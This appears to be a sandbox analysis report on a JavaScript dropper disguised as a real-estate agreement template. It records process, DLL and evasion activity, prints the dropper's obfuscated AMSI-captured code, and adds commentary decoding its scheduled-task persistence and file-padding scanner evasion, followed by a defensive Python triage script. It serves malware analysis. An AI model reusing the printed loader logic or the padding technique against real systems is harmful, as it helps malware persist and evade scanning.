Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: samlib.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: real estate co ownership agreement template 43632.js Static file information: File size 1759107 > 1048576

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript;pSzhKh = loGuOn[P(21)](P(33));GyusB = loGuOn[P(21)](P(38));zTrbW = loGuOn[P(21)](P(40));zTrbW[P(27)]();MtQnm = zTrbW[P(12)]("\\");try{gjKLivoL = MtQnm[P(32)](baFycB);}catch(lRjvr){gjKLivoL = false;}if (gjKLivoL == false) {cpQJZO = GyusB[P(12)](pSzhKh[P(19)](P(13)))[P(18)];rDxbXI = 821-(Math[P(37)](821/cpQJZO[P(3)])*cpQJZO[P(3)]);VVJQ = 0;tjuWU = false;for(VepL = new Enumerator(cpQJZO); !VepL[P(10)](); VepL[P(22)]()) {XiTaKV = VepL[P(23)]();if (rDxbXI==VVJQ) tjuWU = XiTaKV;VVJQ++;}if (tjuWU != false) {AjxBDA = tjuWU+"\\"+CFUXD;if(!GyusB[P(34)](AjxBDA)){tMfet = GyusB[P(20)](AjxBDA, 8, true);tMfet[P(0)](aQNTEFP);VVJQ=0;FFnPq=aQNTEFP.length;while(true) {tMfet[P(0)](aQNTEFP);VVJQ=VVJQ+FFnPq;if (VVJQ>47659877) break;}tMfet[P(11)]();tMfet = GyusB[P(29)](AjxBDA);tMfet[P(2)] = aMsgA;SHPrDg = tMfet[P(41)];nLQXcoW = zTrbW[P(25)](0);nLQXcoW[P(35)][P(6)] = true;nLQXcoW[P(35)][P(26)] = false;EVjSJGM = nLQXcoW[P(36)][P(7)](9);EVjSJGM["ID"] = P(28);EVjSJGM[P(14)] = pSzhKh[P(19)](P(39));eNmbDO = nLQXcoW[P(1)][P(7)](0);eNmbDO[P(31)] = P(5);eNmbDO[P(4)] = SHPrDg;eNmbDO[P(9)] = tjuWU;MtQnm[P(24)](baFycB, nLQXcoW, 6, "" , "" , 3);gjKLivoL = MtQnm[P(32)](baFycB);loGuOn[P(16)](27755);gjKLivoL[P(15)](null, 2, 0, "");}}}loGuOn[P(42)]();}ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 
8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITextStream.Write("650560617905821433189172285812437710244084907636;singlen='*+B?3??.4I+w,E?E8Awb4u';function goldh(bsvgh, jzbnr){return yellow2(bsvgh,jzbnr,yyvt);}developm = 8160;yfkxy='?+tEE?ieceo?Trt) e/+nh?(';bad9='B+(Ow??k?hHj+c?f??)[k++5o?(?'");ITe
Source: Yara match File source: real estate co ownership agreement template 43632.js, type: SAMPLE
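Reading the AMSI capture above: every property and method name is hidden behind a P(n) string-table lookup, and the table itself is not in the capture, so the following is an inference from call shapes rather than a decoded listing. Three objects are created from the script host; one is connected, asked for the folder "\\" and then for a task by name inside a try/catch. If that lookup fails, the script takes the SubFolders collection of an environment-expanded path (the same P(12) token is used for that call and for the folder lookup on the task object, which fits GetFolder existing on both Scripting.FileSystemObject and the Schedule.Service root), picks one subfolder by computing 821 modulo the folder count, opens a file there with mode 8 (ForAppending) and create=true, and writes the same string in a loop until more than 47659877 bytes have gone out. It then builds a task definition via NewTask(0), creates a trigger of type 9 and an action of type 0 whose arguments are the new file's path, registers it with flags 6, empty user and password and logon type 3, sleeps 27755 ms and runs it with (null, 2, 0, ""). In the Task Scheduler 2.0 API those values are TASK_TRIGGER_LOGON, TASK_ACTION_EXEC, TASK_CREATE_OR_UPDATE, TASK_LOGON_INTERACTIVE_TOKEN and TASK_RUN_IGNORE_CONSTRAINTS, so the behaviour is consistent with a logon-persistence task pointing at an oversized copy of the script; the taskschd.dll load recorded for wscript.exe earlier in this report fits the same picture. The repeated ITextStream.Write(...) entries at the end are that padding loop as AMSI saw it.

The padding matters operationally: a 47 MB script file falls outside the size limits many file scanners and e-mail gateways apply, while the real code sits in the first few hundred kilobytes. The block below is an added example, not part of the report, showing the triage check a responder can run over a suspect dropped file: measure how well it compresses and how much of it is one unit repeated back to back. The 40 MB threshold is an assumption about scanner limits, and the sample file is constructed, not the dropped file from this analysis.

```python
"""Triage check for script files padded by a write loop, as in the AMSI capture.

Added example, not from the sandbox report. PADDED_SIZE is an assumption about
scanner size limits; build_constructed_sample() makes a stand-in file, not the
real dropped script."""
import zlib

PADDED_SIZE = 40 * 1024 * 1024  # assumption: files above this are often skipped by scanners
STUB = b"// constructed loader stub, not the real sample\n"
FILLER = b"var pad_unit = 'constructed filler text 0123456789abcdef';\n"


def compression_ratio(data: bytes, sample: int = 4 * 1024 * 1024) -> float:
    """Deflate ratio of the first `sample` bytes; repeated filler compresses to almost nothing."""
    chunk = data[:sample]
    if not chunk:
        return 1.0
    return len(zlib.compress(chunk, 6)) / len(chunk)


def repeat_unit(data: bytes, probe: int = 64) -> bytes:
    """Guess the unit a write loop repeated: take a probe from the middle of the file
    and find its next occurrence; the distance between the two is the unit length."""
    if len(data) < 4 * probe:
        return b""
    mid = len(data) // 2
    needle = data[mid:mid + probe]
    nxt = data.find(needle, mid + 1)
    if nxt == -1 or nxt - mid > len(data) // 4:
        return b""
    return data[mid:nxt]


def repeat_fraction(data: bytes, unit: bytes) -> float:
    """Share of the file made up of back-to-back copies of `unit`."""
    if not unit or not data:
        return 0.0
    return data.count(unit) * len(unit) / len(data)


def triage(data: bytes, size_threshold: int = PADDED_SIZE) -> dict:
    """Combine size, compressibility and repetition into one verdict, keeping the metrics."""
    unit = repeat_unit(data)
    ratio = compression_ratio(data)
    frac = repeat_fraction(data, unit)
    return {
        "size": len(data),
        "compression_ratio": round(ratio, 4),
        "repeat_unit_len": len(unit),
        "repeat_fraction": round(frac, 4),
        # Oversized AND either highly compressible or dominated by one repeated unit.
        "padded": len(data) >= size_threshold and (ratio < 0.05 or frac > 0.8),
    }


def build_constructed_sample(total: int) -> bytes:
    """Constructed stand-in for a padded dropper: a short stub, then one filler string repeated."""
    reps = (total - len(STUB)) // len(FILLER) + 1
    return STUB + FILLER * reps


def constructed_noise(n: int, seed: int = 7) -> bytes:
    """Constructed control input: pseudo-random bytes with no repeats (xorshift-style, no imports)."""
    out, x = bytearray(), seed or 1
    while len(out) < n:
        x ^= (x << 13) & 0xFFFFFFFF
        x ^= x >> 17
        x ^= (x << 5) & 0xFFFFFFFF
        out += x.to_bytes(4, "little")
    return bytes(out[:n])


if __name__ == "__main__":
    print(triage(build_constructed_sample(2 * 1024 * 1024), size_threshold=1024 * 1024))
    print(triage(constructed_noise(256 * 1024), size_threshold=1024 * 1024))
```

For a real dropped file, read it in binary, call triage() with the default threshold, and keep the head of the file (everything before the first full copy of the repeat unit) for static analysis: that is where the loader logic lives. Note that the check only identifies the padding; a padded file that compresses well is a strong hint, not proof, and a scanner that truncates at a size limit will still miss it, which is the point of the technique.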

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cscript.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5524
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6140
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 4421 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3216 Thread sleep count: 5524 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3232 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep count: 6140 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4868 Thread sleep count: 3519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
